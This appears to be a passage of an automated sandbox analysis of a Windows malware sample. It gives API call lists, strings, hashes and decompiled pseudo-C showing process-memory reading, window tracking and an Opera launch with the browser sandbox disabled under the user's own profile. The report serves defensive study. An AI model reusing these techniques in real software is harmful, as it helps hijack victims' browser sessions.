                                          0x00c825bc 0x00c825bc 0x00c825bc 0x00c825bc 0x00c825bc 0x00c825c1 0x00c825cb 0x00c825cd 0x00c825d6 0x00c825df
                                          0x00c825e9 0x00c8264a 0x00c8264a 0x00c8264d 0x00c82654 0x00c8265a 0x00c82661 0x00c82664 0x00c8266e 0x00c8266e
                                          0x00c82678 0x00c82684 0x00c8268c 0x00c82692 0x00c82699 0x00c8269c 0x00c826c9 0x00c826d6 0x00c826dc 0x00c826dc
                                          0x00c826dc 0x00c8269e 0x00c826ab 0x00c826ad 0x00c826b3 0x00c826b3 0x00c826e3 0x00c82666 0x00c82666 0x00c82666
                                          0x00c826e5 0x00c826f4 0x00c826f4 0x00c825f2 0x00c825f8 0x00c825ff 0x00000000 0x00000000 0x00c8260d 0x00c8262d
                                          0x00c8262d 0x00c82633 0x00c82636 0x00c82639 0x00c8263c 0x00000000 0x00000000 0x00c82620 0x00c8262a 0x00c82645
                                          0x00000000 0x00c82645 0x00c825d8 0x00000000

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Window$CreateCriticalErrorEventInitializeLastSection
                                          • String ID:
                                          • API String ID: 1676008072-0
                                          • Opcode ID: c2cf340048eff2efb7f4f9c81f0aba249f4bd5dc67e93ab25e1dc3816c3b71ea
                                          • Instruction ID: 5846b4ae339efdbb6604bf026e0efa5a142874adf91b42ea1e121bc01bfd95e0
                                          • Opcode Fuzzy Hash: c2cf340048eff2efb7f4f9c81f0aba249f4bd5dc67e93ab25e1dc3816c3b71ea
                                          • Instruction Fuzzy Hash: 7D317536604B4083FB54AF31E55876A3361E788F88F588635DE590B728EF38C8898718
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00C6502C: ZwQueryInformationProcess.NTDLL(?,?,KERNEL32.DLL,?,?,?,00000000,00000002,00000000,00000000,00C6491B,00000000,?,LoadLibraryA,?,00000000), ref: 00C65079
                                            • Part of subcall function 00C6502C: ReadProcessMemory.KERNEL32(?,?,KERNEL32.DLL,?,?,?,00000000,00000002,00000000,00000000,00C6491B,00000000,?,LoadLibraryA,?,00000000), ref: 00C650CF
                                            • Part of subcall function 00C6502C: ReadProcessMemory.KERNEL32(?,?,KERNEL32.DLL,?,?,?,00000000,00000002,00000000,00000000,00C6491B,00000000,?,LoadLibraryA,?,00000000), ref: 00C650F5
                                            • Part of subcall function 00C6502C: ReadProcessMemory.KERNEL32(?,?,KERNEL32.DLL,?,?,?,00000000,00000002,00000000,00000000,00C6491B,00000000,?,LoadLibraryA,?,00000000), ref: 00C65141
                                          • VirtualAlloc.KERNEL32(00000000,?,LoadLibraryA,?,00000000,00C64783,?,?,?,?,00000000,?,?,00000000,00001644,00C64C46), ref: 00C6492F
                                          • VirtualFree.KERNEL32(?,?,?,?,00000000,?,?,00000000,00001644,00C64C46,00000000,00000000,00001644,00C61769), ref: 00C64A24
                                            • Part of subcall function 00C6502C: ReadProcessMemory.KERNEL32(?,?,KERNEL32.DLL,?,?,?,00000000,00000002,00000000,00000000,00C6491B,00000000,?,LoadLibraryA,?,00000000), ref: 00C651BA
                                            • Part of subcall function 00C6502C: StrRChrA.SHLWAPI(?,?,KERNEL32.DLL,?,?,?,00000000,00000002,00000000,00000000,00C6491B,00000000,?,LoadLibraryA,?,00000000), ref: 00C651F5
                                          • VirtualFree.KERNEL32(?,?,?,?,00000000,?,?,00000000,00001644,00C64C46,00000000,00000000,00001644,00C61769), ref: 00C6496D
                                          • VirtualAlloc.KERNEL32(?,?,?,?,00000000,?,?,00000000,00001644,00C64C46,00000000,00000000,00001644,00C61769), ref: 00C64981
                                          • lstrcmpiA.KERNEL32(?,?,?,?,00000000,?,?,00000000,00001644,00C64C46,00000000,00000000,00001644,00C61769), ref: 00C649B8
                                          • StrChrA.SHLWAPI(?,?,?,?,00000000,?,?,00000000,00001644,00C64C46,00000000,00000000,00001644,00C61769), ref: 00C649CA
                                          • lstrcmpiA.KERNEL32(?,?,?,?,00000000,?,?,00000000,00001644,00C64C46,00000000,00000000,00001644,00C61769), ref: 00C649DE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Process$MemoryReadVirtual$AllocFreelstrcmpi$InformationQuery
                                          • String ID: LoadLibraryA
                                          • API String ID: 3835057325-1069661581
                                          • Opcode ID: 747faf28cbae03b8ef16c53ffebdc2f179a6b01932bca5d5da34c7b31e1f3cc6
                                          • Instruction ID: 660b5f7779c503dd48cdad009effb42254fffc6094bfd9a91c126e34c6dbbd91
                                          • Opcode Fuzzy Hash: 747faf28cbae03b8ef16c53ffebdc2f179a6b01932bca5d5da34c7b31e1f3cc6
                                          • Instruction Fuzzy Hash: 7831F232340B9092EB399F26E440B2BB795BB88F84F488424DE5957B04EF3CDA46D744
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 28%
                                          			E00C81B4C(long long __rbx, void* __rcx, long long __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9) {
                                          				void* _v8;
                                          				intOrPtr _v36;
                                          				void* _v68;
                                          				char _v72;
                                          				signed char _t30;
                                          				void* _t44;
                                          				void* _t45;
                                          				void* _t50;
                                          				long long* _t52;
                                          				long long* _t53;
                                          				long long _t74;
                                          				void* _t77;
                                          				void* _t81;
                                          				void* _t85;
                                          				struct HWND__* _t87;
                                          				long long _t89;
                                          
                                          				_t85 = __r9;
                                          				_t53 = __rbx;
                                          				_t50 = _t81;
                                          				 *((long long*)(_t50 + 8)) = __rbx;
                                          				 *((long long*)(_t50 + 0x10)) = __rbp;
                                          				 *((long long*)(_t50 + 0x18)) = __rsi;
                                          				 *((long long*)(_t50 + 0x20)) = __rdi;
                                          				_t77 = __rcx;
                                          				_t74 = __rdx;
                                          				if(IsWindow(_t87) != 0) {
                                          					L2:
                                          					_t6 = _t77 + 0x88; // 0x88
                                          					_t30 = E00C7BB64(_t50, _t53, _t6, _t74, _t85);
                                          					if((_t30 & 0x00000004) != 0) {
                                          						goto L9;
                                          					} else {
                                          						_t52 =  *((intOrPtr*)(_t77 + 0x1d0));
                                          						_t49 = _t52;
                                          						if(_t52 != 0) {
                                          							while(1) {
                                          								__eflags =  *_t52 - _t74;
                                          								if( *_t52 == _t74) {
                                          									goto L10;
                                          								}
                                          								_t89 = _t52;
                                          								_t52 =  *((intOrPtr*)(_t52 + 0x38));
                                          								__eflags = _t52;
                                          								if(_t52 != 0) {
                                          									continue;
                                          								} else {
                                          									_t13 = _t52 + 0x48; // 0xc6c2af
                                          									_t44 = _t13;
                                          									r8d = _t44;
                                          									HeapAlloc(??, ??, ??);
                                          									r8d = _t44;
                                          									__eflags = 0;
                                          									 *((long long*)(_t89 + 0x38)) = _t52;
                                          									_t53 = _t52;
                                          									memset(??, ??, ??);
                                          									 *((long long*)(_t53 + 0x40)) = _t89;
                                          									goto L8;
                                          								}
                                          								goto L10;
                                          							}
                                          						} else {
                                          							_t45 = _t52 + 0x48;
                                          							r8d = _t45;
                                          							HeapAlloc(??, ??, ??);
                                          							r8d = _t45;
                                          							 *((long long*)(_t77 + 0x1d0)) = _t52;
                                          							_t53 = _t52;
                                          							memset(??, ??, ??);
                                          							L8:
                                          							_v72 = 0x3c;
                                          							 *_t53 = _t74;
                                          							GetWindowInfo(??, ??);
                                          							 *((intOrPtr*)(_t53 + 0x14)) = E00C7BE8C( &_v72);
                                          							r8d = 0x10;
                                          							 *((intOrPtr*)(_t53 + 0x10)) = _v36;
                                          							memcpy(??, ??, ??);
                                          							_t30 = E00C81D90(_t49, _t52, _t53, _t77, _t53, _t77);
                                          							goto L9;
                                          						}
                                          					}
                                          				} else {
                                          					_t5 = _t77 + 0x88; // 0x88
                                          					_t30 = E00C7C050(_t50, __rbx, _t5, __rdx, __rcx);
                                          					if(_t30 != 0) {
                                          						goto L2;
                                          					}
                                          				}
                                          				L10:
                                          				return _t30;
                                          			}


                                          APIs
                                          • IsWindow.USER32 ref: 00C81B70
                                          • HeapAlloc.KERNEL32 ref: 00C81BC3
                                          • memset.NTDLL ref: 00C81BDB
                                          • HeapAlloc.KERNEL32 ref: 00C81C06
                                          • memset.NTDLL ref: 00C81C1B
                                          • GetWindowInfo.USER32 ref: 00C81C37
                                          • memcpy.NTDLL(?,?,?,?,?,?,?,?,00C82625), ref: 00C81C60
                                            • Part of subcall function 00C7C050: IsWindow.USER32 ref: 00C7C06A
                                            • Part of subcall function 00C7C050: GetAncestor.USER32(?,?,?,00C7C19D), ref: 00C7C093
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Window$AllocHeapmemset$AncestorInfomemcpy
                                          • String ID: <
                                          • API String ID: 1110733298-4251816714
                                          • Opcode ID: f0e11183cc8415d312e310dd61a583f2b91275c778d87228157dc37baf906a94
                                          • Instruction ID: 96a257235cdfc59e4cebf6024d153e132565bc8e00158ff63915c9763fc08b8f
                                          • Opcode Fuzzy Hash: f0e11183cc8415d312e310dd61a583f2b91275c778d87228157dc37baf906a94
                                          • Instruction Fuzzy Hash: 38318D72300B4482EB24DF22E88076973A9F788FC4F498129DE5E83B14EF38C546C744
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 29%
                                          			E00C76F88(signed long long __rax, long long __rbx, void* __rcx, long long __rdi, long long __rsi, char* __r8, long long __r14) {
                                          				void* __rbp;
                                          				void* _t21;
                                          				signed long long _t33;
                                          				char* _t45;
                                          				void* _t46;
                                          				char* _t51;
                                          				void* _t53;
                                          				void* _t54;
                                          				void* _t55;
                                          				void* _t57;
                                          				char* _t58;
                                          				void* _t60;
                                          
                                          				_t58 = __r8;
                                          				_t36 = __rcx;
                                          				_t34 = __rbx;
                                          				_t32 = __rax;
                                          				_t55 = _t54 - 0x240;
                                          				_t53 = _t55 + 0x30;
                                          				 *((long long*)(_t53 + 0x220)) = __rbx;
                                          				 *((long long*)(_t53 + 0x228)) = __rsi;
                                          				_t4 = _t36 + 0x774; // 0x774
                                          				_t51 = _t4;
                                          				 *((long long*)(_t53 + 0x230)) = __rdi;
                                          				 *((long long*)(_t53 + 0x238)) = __r14;
                                          				r14d = 0;
                                          				if(_t51 != 0) {
                                          					lstrlenA();
                                          					_t7 = _t32 + 1; // 0x1
                                          					r8d = _t7;
                                          					_t46 = __r8 + __r8;
                                          					_t33 = _t46 + 0xf;
                                          					if(_t33 <= _t46) {
                                          						_t33 = 0xfffffff0;
                                          					}
                                          					_t32 = _t33 & 0xfffffff0;
                                          					E00C6A4A0();
                                          					_t57 = _t55 - (_t33 & 0xfffffff0);
                                          					r9d = r9d | 0xffffffff;
                                          					 *((intOrPtr*)(_t57 + 0x28)) = r8d;
                                          					_t34 = _t57 + 0x30;
                                          					_t58 = _t51;
                                          					 *_t34 = r14w;
                                          					 *((long long*)(_t57 + 0x20)) = _t34;
                                          					MultiByteToWideChar(??, ??, ??, ??, ??, ??);
                                          				}
                                          				lstrcpyW();
                                          				lstrcatW(??, ??);
                                          				r8d = 0;
                                          				E00C770A8(_t32, _t34, L"APPDATA", _t51, _t53, _t58, _t53);
                                          				_t21 = E00C6ADD8();
                                          				_t60 = _t53;
                                          				if(_t21 > 5) {
                                          					r8d = 0;
                                          					_t45 = L"LOCALAPPDATA";
                                          				} else {
                                          					_t58 = L"\\Local Settings\\Application Data";
                                          					_t45 = L"USERPROFILE";
                                          				}
                                          				return E00C770A8(_t32, _t34, _t45, _t51, _t53, _t58, _t60);
                                          			}


                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharMultiWidelstrcatlstrcpylstrlen
                                          • String ID: APPDATA$LOCALAPPDATA$USERPROFILE$\Local Settings\Application Data
                                          • API String ID: 3312154097-664161059
                                          • Opcode ID: 96f297e64d1857451f2d378c609722e759ae5074f45e1fb9a645a81e4c19d71b
                                          • Instruction ID: df1438e690c77a70e0e54d55d2ba29b4fd73940a553af49d6d143e9404a8eabc
                                          • Opcode Fuzzy Hash: 96f297e64d1857451f2d378c609722e759ae5074f45e1fb9a645a81e4c19d71b
                                          • Instruction Fuzzy Hash: 72216232214AC5D5EB209F71E894BDC7365F744BA8F849312DA2D1BBA8DF38C24AC704
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlenW.KERNEL32(?,?,?,00C77A94,?,?,?,00C63778), ref: 00C77BD2
                                          • HeapAlloc.KERNEL32(?,?,?,00C77A94,?,?,?,00C63778), ref: 00C77BF2
                                          • SetLastError.KERNEL32(?,?,?,00C77A94,?,?,?,00C63778), ref: 00C77C03
                                          • wsprintfW.USER32 ref: 00C77C1A
                                          • lstrcmpW.KERNEL32(?,?,?,00C77A94,?,?,?,00C63778), ref: 00C77C2A
                                          • lstrcatW.KERNEL32 ref: 00C77C3E
                                          • lstrcatW.KERNEL32 ref: 00C77C4A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$AllocErrorHeapLastlstrcmplstrlenwsprintf
                                          • String ID: Default
                                          • API String ID: 4106241528-753088835
                                          • Opcode ID: 5bd8e09f24005a7f32539fcb6662382b5387aa8da5e45f42ee9a872fe66d91bd
                                          • Instruction ID: 37479abff7977a37fa264c3cf27c17f1a8c3c0549f6c8be0659f5f644f90859a
                                          • Opcode Fuzzy Hash: 5bd8e09f24005a7f32539fcb6662382b5387aa8da5e45f42ee9a872fe66d91bd
                                          • Instruction Fuzzy Hash: 61117F74304B8581FA148B12F9447696361EB8CFD0F98C2219E1A47B24EF3DC589C704
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlenA.KERNEL32(?,?,?,00C77955,?,?,?,00C63740), ref: 00C77AFA
                                          • HeapAlloc.KERNEL32(?,?,?,00C77955,?,?,?,00C63740), ref: 00C77B17
                                          • SetLastError.KERNEL32(?,?,?,00C77955,?,?,?,00C63740), ref: 00C77B28
                                          • lstrcpyA.KERNEL32(?,?,?,00C77955,?,?,?,00C63740), ref: 00C77B38
                                          • lstrcmpA.KERNEL32(?,?,?,00C77955,?,?,?,00C63740), ref: 00C77B48
                                          • lstrcatA.KERNEL32(?,?,?,00C77955,?,?,?,00C63740), ref: 00C77B5C
                                          • lstrcatA.KERNEL32(?,?,?,00C77955,?,?,?,00C63740), ref: 00C77B68
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$AllocErrorHeapLastlstrcmplstrcpylstrlen
                                          • String ID: Default
                                          • API String ID: 4072419705-753088835
                                          • Opcode ID: 96f9a34feb047c6e22b2438f2389fafb14d51e5903c64fe0ef7d08b07b2aebc5
                                          • Instruction ID: d34d280b828a67834171f9e725521300ef3aeda9a4db5a187c57fc8bfe8e2fa1
                                          • Opcode Fuzzy Hash: 96f9a34feb047c6e22b2438f2389fafb14d51e5903c64fe0ef7d08b07b2aebc5
                                          • Instruction Fuzzy Hash: 90118264705B4186FE249F12F8487597361FB88FC4F98D2319E1A47B24DF3DD54A8748
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          • opera.exe, xrefs: 00C76EF4
                                          • --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11, xrefs: 00C76EC4
                                          • Opera Software\Opera Stable, xrefs: 00C76ED0
                                          • APPDATA, xrefs: 00C76EE6
                                          • OPRN, xrefs: 00C76EED
                                          • --user-data-dir=, xrefs: 00C76ED7
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: PathRemove$ArgsBlanks
                                          • String ID: --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11$ --user-data-dir=$APPDATA$OPRN$Opera Software\Opera Stable$opera.exe
                                          • API String ID: 3367427818-3321430093
                                          • Opcode ID: 8340036eebc8043cb3e93b9764cd0e7b4c2e1756ea22cf72bdda6750658ba07b
                                          • Instruction ID: e7676657cd85d50030d494e097bf596b8422a28b001f10bb2c9522b2a3728581
                                          • Opcode Fuzzy Hash: 8340036eebc8043cb3e93b9764cd0e7b4c2e1756ea22cf72bdda6750658ba07b
                                          • Instruction Fuzzy Hash: C9012871208B8591FB108B11F9417AA73A4F788BD0F448222EA8D03B38EF3CC55AC705
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ClipObjectViewport$CreateDeleteFromMutexRectReleaseSelectSingleWaitWindow
                                          • String ID:
                                          • API String ID: 3315380975-0
                                          • Opcode ID: 430227cecb4a553035d76738b229a9d24f85a849dccca27406bd5df1c023f19c
                                          • Instruction ID: d61ce8f37521393226cb92ea2fb194392424d9e7b99b6ba73f2f16969ede7a98
                                          • Opcode Fuzzy Hash: 430227cecb4a553035d76738b229a9d24f85a849dccca27406bd5df1c023f19c
                                          • Instruction Fuzzy Hash: 8441C936609B808BE760CF16E484B4EB7A1F788B90F508625EE9D93B68DF38D445CF04
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ClipObjectViewport$CreateDeleteFromMutexRectReleaseSelectSingleWaitWindow
                                          • String ID:
                                          • API String ID: 3315380975-0
                                          • Opcode ID: c3b1197280408dd03c6e12fe0c3f1574ab34dc0aff50c3c921cebb3180cc4384
                                          • Instruction ID: 8bbe6b4014ab732277007fa4a8b87dda170769956935a96a579c108eba53e941
                                          • Opcode Fuzzy Hash: c3b1197280408dd03c6e12fe0c3f1574ab34dc0aff50c3c921cebb3180cc4384
                                          • Instruction Fuzzy Hash: 75412F76704B808BE760CF16E844B5AB7A1F789B90F548625EE9943B14DF3CC449CB04
                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: DeleteObject$Select$ColorCompatibleCreateEntriesPaletteSystemTable
                                          • String ID:
                                          • API String ID: 4035217877-0
                                          • Opcode ID: b087146f7122ed4dc4975e12b7782f83ce4ff62c8d1374c68657605817ed5213
                                          • Instruction ID: f36776e833cc056d8ea4d15f097d768b03117d05af74f1cb412121fa2238f0ba
                                          • Opcode Fuzzy Hash: b087146f7122ed4dc4975e12b7782f83ce4ff62c8d1374c68657605817ed5213
                                          • Instruction Fuzzy Hash: 9431C3223196C088EB21CB65A4147996760E76EF88F98C265D98E43F55DE2DC10ECB14
                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: HeapPathTemplstrcat$AllocByteCharFreeMultiWidelstrcpylstrlen
                                          • String ID:
                                          • API String ID: 2712064585-0
                                          • Opcode ID: ce183ec71e36f2c81bb10356a5680a8808691f0df195b9acda88bd1ca773687d
                                          • Instruction ID: d9052432800b32014614f8b4aa95da73200e5708f4d7b23121fbbba356696276
                                          • Opcode Fuzzy Hash: ce183ec71e36f2c81bb10356a5680a8808691f0df195b9acda88bd1ca773687d
                                          • Instruction Fuzzy Hash: 5F314372311B8195EB249F21DC98B992361F784BA4F84C325DE2D57BA8DF38C64AC704
                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00C7A974: GetEnvironmentVariableW.KERNEL32(?,?,00000000,00C7A44D,?,?,?,00C767A8), ref: 00C7A98D
                                            • Part of subcall function 00C7A974: HeapAlloc.KERNEL32(?,?,00000000,00C7A44D,?,?,?,00C767A8), ref: 00C7A9A8
                                            • Part of subcall function 00C7A974: GetEnvironmentVariableW.KERNEL32(?,?,00000000,00C7A44D,?,?,?,00C767A8), ref: 00C7A9C3
                                            • Part of subcall function 00C7A974: GetLastError.KERNEL32(?,?,00000000,00C7A44D,?,?,?,00C767A8), ref: 00C7A9D5
                                            • Part of subcall function 00C7A974: HeapFree.KERNEL32(?,?,00000000,00C7A44D,?,?,?,00C767A8), ref: 00C7A9E9
                                            • Part of subcall function 00C7A974: SetLastError.KERNEL32(?,?,00000000,00C7A44D,?,?,?,00C767A8), ref: 00C7AA9C
                                          • GetLastError.KERNEL32(?,?,?,00C767A8), ref: 00C7A455
                                          • lstrlenW.KERNEL32(?,?,?,00C767A8), ref: 00C7A462
                                          • lstrlenW.KERNEL32(?,?,?,00C767A8), ref: 00C7A46D
                                          • HeapAlloc.KERNEL32(?,?,?,00C767A8), ref: 00C7A487
                                          • HeapFree.KERNEL32(?,?,?,00C767A8), ref: 00C7A4D5
                                          • SetLastError.KERNEL32(?,?,?,00C767A8), ref: 00C7A4E1
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: ErrorHeapLast$AllocEnvironmentFreeVariablelstrlen
                                          • String ID:
                                          • API String ID: 2453418766-0
                                          • Opcode ID: 123ba793b734e441194a7d83e4cc6b26bcf0e18ce4043ce29f06484379a48e71
                                          • Instruction ID: 848cea32a481c9e7ab91a14cc31c7a7399dd8f1f2e285e5f7752fd37fb6bdfe2
                                          • Opcode Fuzzy Hash: 123ba793b734e441194a7d83e4cc6b26bcf0e18ce4043ce29f06484379a48e71
                                          • Instruction Fuzzy Hash: C1111F25304B8086FB14DB62B99872D6361BBC8FD0F88D524DE5A07B25DF7CC5498709
                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 39%
                                          			E00C7D0E0(long long __rbx, void* __rcx, intOrPtr* __rdx, signed long long __rdi, long long __rsi, void* __r8, void* __r9) {
                                          				void* __rbp;
                                          				void* _t67;
                                          				int _t69;
                                          				int _t72;
                                          				int _t73;
                                          				int _t74;
                                          				int _t77;
                                          				intOrPtr _t81;
                                          				intOrPtr _t87;
                                          				void* _t90;
                                          				void* _t92;
                                          				void* _t95;
                                          				intOrPtr* _t109;
                                          				signed long long _t118;
                                          				int _t121;
                                          				signed long long _t122;
                                          				int _t123;
                                          				void* _t126;
                                          				int _t128;
                                          				void* _t129;
                                          				void* _t132;
                                          				void* _t136;
                                          				int _t143;
                                          				int _t145;
                                          				long long* _t148;
                                          
                                          				_t136 = __r9; // 0x00c7d0e0
                                          				_t118 = __rdi; // 0x00c7d0e0
                                          				_t109 = __rdx; // 0x00c7d0e0
                                          				_t92 = __rcx; // 0x00c7d0e0
                                          				_t86 = _t128; // 0x00c7d0e0
                                          				 *((long long*)(_t86 + 0x10)) = __rbx; // 0x00c7d0e3
                                          				 *((long long*)(_t86 + 0x18)) = __rsi; // 0x00c7d0e7
                                          				 *((long long*)(_t86 + 0x20)) = __rdi; // 0x00c7d0eb
                                          				_t126 = _t86 - 0x1248; // 0x00c7d0f8
                                          				E00C6A4A0(); // 0x00c7d104
                                          				_t129 = _t128 - _t86; // 0x00c7d109
                                          				_t90 = __rcx; // 0x00c7d10e
                                          				if(__rdx == 0) { // 0x00c7d114
                                          					 *((intOrPtr*)(_t129 + 0x58)) =  *((intOrPtr*)(__rcx + 0x294)); // 0x00c7d127
                                          					 *((intOrPtr*)(_t129 + 0x5c)) =  *((intOrPtr*)(__rcx + 0x298)); // 0x00c7d131
                                          					 *((long long*)(_t129 + 0x50)) = __rdi; // 0x00c7d135
                                          				} else { // 0x00c7d116
                                          					asm("movups xmm0, [edx]"); // 0x00c7d116  (copies the 16-byte RECT that __rdx points to)
                                          					asm("movdqu [esp+0x50], xmm0"); // 0x00c7d119
                                          				} // 0x00c7d119
                                          				if(( *(_t92 + 0xb8) & 0x00000010) == 0) { // 0x00c7d141
                                          					r12d = 0; // 0x00c7d18f
                                          					r13d = 0; // 0x00c7d192
                                          					EnterCriticalSection(??); // 0x00c7d195
                                          					_t121 =  *((intOrPtr*)(_t90 + 0x1d0)); // 0x00c7d19b  (head of the tracked-window list; each node: +0 HWND, +0x38 next)
                                          					__eflags = _t121; // 0x00c7d1a2
                                          					if(_t121 != 0) { // 0x00c7d1a5
                                          						_t145 = _t126 + 0x280; // 0x00c7d1ab
                                          						_t148 = _t129 + 0x60; // 0x00c7d1b2
                                          						do { // 0x00c7d1b7
                                          							_t72 = E00C7C134(_t90,  *_t121); // 0x00c7d1ba  (subcall: IsWindowVisible + GetWindowLongPtrA)
                                          							__eflags = _t72; // 0x00c7d1c1
                                          							_t77 = 0 | _t72 == 0x00000000; // 0x00c7d1c3
                                          							 *(_t121 + 0x18) = _t77; // 0x00c7d1c6
                                          							__eflags = _t77; // 0x00c7d1c9
                                          							if(_t77 == 0) { // 0x00c7d1cb
